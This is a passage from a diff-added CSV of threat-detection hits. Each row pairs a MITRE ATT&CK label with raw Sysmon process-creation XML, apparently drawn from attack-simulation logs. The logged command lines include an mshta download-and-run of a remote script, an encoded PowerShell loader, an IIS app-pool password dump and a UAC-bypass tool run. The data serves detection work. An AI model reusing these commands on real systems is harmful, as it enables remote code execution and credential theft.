+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:18.046159Z"">
+    </TimeCreated>
+    <EventRecordID>243527</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:17.682</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-001059841E00</Data>
+    <Data Name=""ProcessId"">8076</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1602619902.353945,2020-10-14T00:11:42.353945+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\windows\system32\cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-10-13T20:11:42.279861Z"">
+    </TimeCreated>
+    <EventRecordID>2196443</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""5340"" ThreadID=""7092"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>LAPTOP-JU4M3I0E</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-10-13 20:11:42.277</Data>
+    <Data Name=""ProcessGuid"">00247C92-09FE-5F86-0000-0010AD861401</Data>
+    <Data Name=""ProcessId"">7648</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.18362.449 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">Cmd.Exe</Data>
+    <Data Name=""CommandLine"">c:\windows\system32\cmd.exe</Data>
+    <Data Name=""CurrentDirectory"">c:\Windows\System32\</Data>
+    <Data Name=""User"">LAPTOP-JU4M3I0E\bouss</Data>
+    <Data Name=""LogonGuid"">00247C92-DE70-5F85-0000-002059F80600</Data>
+    <Data Name=""LogonId"">0x6f859</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">00247C92-09FE-5F86-0000-001051841401</Data>
+    <Data Name=""ParentProcessId"">1716</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\wuauclt.exe</Data>
+    <Data Name=""ParentCommandLine"">wuauclt.exe   /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer </Data>
+  </EventData>
+</Event>",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1558452777.867089,2019-05-21T19:32:57.867089+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe  javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new%%20ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;mshta https://hotelesms.com/talsk.txt&quot;,0,true); )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-21T15:32:57.286254Z"">
+    </TimeCreated>
+    <EventRecordID>4126</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3416"" ThreadID=""3496"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-21 15:32:57.276</Data>
+    <Data Name=""ProcessGuid"">365ABB72-1A29-5CE4-0000-00107BE42101</Data>
+    <Data Name=""ProcessId"">2920</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">rundll32.exe  javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new%%20ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;mshta https://hotelesms.com/talsk.txt&quot;,0,true);</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-39CC-5CE3-0000-002096C70000</Data>
+    <Data Name=""LogonId"">0xc796</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-1A29-5CE4-0000-001054E32101</Data>
+    <Data Name=""ParentProcessId"">1532</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">cmd.exe  /C rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new%20ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;mshta https://hotelesms.com/talsk.txt&quot;,0,true);</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920558.5225,2019-05-27T05:29:18.522500+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list apppool /text:processmodel.password ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T01:29:18.522500Z"">
+    </TimeCreated>
+    <EventRecordID>5928</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""324"" ThreadID=""2260"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 01:29:18.472</Data>
+    <Data Name=""ProcessGuid"">365ABB72-3D6E-5CEB-0000-0010CC99FF00</Data>
+    <Data Name=""ProcessId"">344</Data>
+    <Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
+    <Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Application Server Command Line Admin Tool</Data>
+    <Data Name=""Product"">Internet Information Services</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list apppool /text:processmodel.password</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
+    <Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
+    <Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
+    <Data Name=""LogonId"">0x82423</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
+    <Data Name=""ParentProcessId"">2584</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot;  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1086] PowerShell Process found,1611667274.399477,2021-01-26T17:21:14.399477+04:00,,Threat,High,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell.exe   start-process notepad.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-01-26T13:21:14.023510Z"">
+    </TimeCreated>
+    <EventRecordID>2429138</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""5272"" ThreadID=""6060"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>LAPTOP-JU4M3I0E</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2021-01-26 13:21:14.021</Data>
+    <Data Name=""ProcessGuid"">00247C92-174A-6010-0000-0010C0B2D92E</Data>
+    <Data Name=""ProcessId"">18548</Data>
+    <Data Name=""Image"">C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""FileVersion"">10.0.18362.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows PowerShell</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">PowerShell.EXE</Data>
+    <Data Name=""CommandLine"">powershell.exe   start-process notepad.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\bouss\source\repos\blabla\blabla\</Data>
+    <Data Name=""User"">LAPTOP-JU4M3I0E\bouss</Data>
+    <Data Name=""LogonGuid"">00247C92-5082-600D-0000-0020A246F726</Data>
+    <Data Name=""LogonId"">0x26f746a2</Data>
+    <Data Name=""TerminalSessionId"">5</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=2223E8613BB0DD90888B17367007489FE16693E4,MD5=BCC5A6493E0641AA1E60CBF69469E579,SHA256=7762A4766BC394B4CB2D658144B207183FF23B3139181CD74E615DB63E6E57D6,IMPHASH=C6A0924236A2CDF364F3D2FAD87F702A</Data>
+    <Data Name=""ParentProcessGuid"">00247C92-1749-6010-0000-0010EFAAD92E</Data>
+    <Data Name=""ParentProcessId"">23168</Data>
+    <Data Name=""ParentImage"">C:\Windows\SysWOW64\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\windows\system32\cmd.exe&quot;  /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd</Data>
+  </EventData>
+</Event>",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
+[T1053] Scheduled Task - Process,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( &quot;C:\Windows\System32\schtasks.exe&quot; /delete /tn elevator ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-12T00:32:40.342246Z"">
+    </TimeCreated>
+    <EventRecordID>16249</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1996"" ThreadID=""1832"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-12 00:32:40.164</Data>
+    <Data Name=""ProcessGuid"">365ABB72-69A8-5CD7-0000-0010C0982200</Data>
+    <Data Name=""ProcessId"">3792</Data>
+    <Data Name=""Image"">C:\Windows\System32\schtasks.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Manages scheduled tasks</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\schtasks.exe&quot; /delete /tn elevator</Data>
+    <Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-5DEC-5CD7-0000-00204A380100</Data>
+    <Data Name=""LogonId"">0x1384a</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-6998-5CD7-0000-00104E422200</Data>
+    <Data Name=""ParentProcessId"">2740</Data>
+    <Data Name=""ParentImage"">C:\Python27\python.exe</Data>
+    <Data Name=""ParentCommandLine"">python  winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558969965.49171,2019-05-27T19:12:45.491710+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=&quot;swprv&quot;) get state ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T15:12:45.405337Z"">
+    </TimeCreated>
+    <EventRecordID>6175</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""980"" ThreadID=""2220"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 15:12:45.383</Data>
+    <Data Name=""ProcessGuid"">365ABB72-FE6D-5CEB-0000-0010332A0C00</Data>
+    <Data Name=""ProcessId"">3876</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=&quot;swprv&quot;) get state</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-FD85-5CEB-0000-00104C0E0B00</Data>
+    <Data Name=""ParentProcessId"">1944</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\notepad.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\notepad.exe&quot;</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1558969965.49171,2019-05-27T19:12:45.491710+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=&quot;swprv&quot;) get state ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T15:12:45.405337Z"">
+    </TimeCreated>
+    <EventRecordID>6175</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""980"" ThreadID=""2220"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 15:12:45.383</Data>
+    <Data Name=""ProcessGuid"">365ABB72-FE6D-5CEB-0000-0010332A0C00</Data>
+    <Data Name=""ProcessId"">3876</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=&quot;swprv&quot;) get state</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-FD85-5CEB-0000-00104C0E0B00</Data>
+    <Data Name=""ParentProcessId"">1944</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\notepad.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\notepad.exe&quot;</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
